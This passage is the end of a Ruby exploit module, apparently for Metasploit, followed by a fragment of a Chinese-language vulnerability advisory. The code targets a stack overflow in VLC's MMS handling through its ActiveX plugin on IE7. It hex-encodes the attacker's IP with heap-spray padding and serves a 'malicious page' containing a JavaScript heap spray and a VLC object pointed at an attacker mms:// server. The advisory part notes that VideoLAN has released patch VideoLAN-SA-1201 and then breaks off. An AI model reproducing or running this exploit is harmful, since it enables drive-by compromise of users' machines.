src_ip = Rex::Socket.source_address.split('.')
hex_ip = src_ip.map { |h| [h.to_i].pack('C*')[0].unpack('H*')[0] }.join
# Try to maximize success on IE7 platform:
# If first octet of IP address is minor than 16 pad with zero
# even when heap spray could be not successful.
# Else pad following target heap spray criteria.
if ((hex_ip.to_i(16) >> 24) < 16)
padding_char = '0'
else
padding_char = my_target['Padding']
end
hex_ip = "0x#{padding_char * my_target['Offset']}#{hex_ip}"
html = <<-EOS
<html>
<head>
<script>
#{js_spray}
</script>
</head>
<body>
<OBJECT classid="clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921"
codebase="http://downloads.videolan.org/pub/videolan/vlc/latest/win32/axvlc.cab"
events="True">
<param value="mms://#{hex_ip}:#{datastore['SRVPORT']}" />
<param value="True" />
<param value="False" />
<param value="True" />
<EMBED pluginspage="http://www.videolan.org"
type="application/x-vlc-plugin" progid="VideoLAN.VLCPlugin.2"
autoplay="yes"
loop="no"
target="mms://#{hex_ip}:#{datastore['SRVPORT']}"
>
</EMBED>
</OBJECT>
</body>
</html>
EOS
#Remove extra tabs in HTML
html = html.gsub(/^\t\t/, "")
print_status("Sending malicious page")
send_response( cli, html, {'Content-Type' => 'text/html'} )
end
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
VideoLAN
--------
VideoLAN已经为此发布了一个安全公告(VideoLAN-SA-1201)以及相应补丁:
VideoLAN-SA-1201:Stack overflow in VLC MMS support
链接: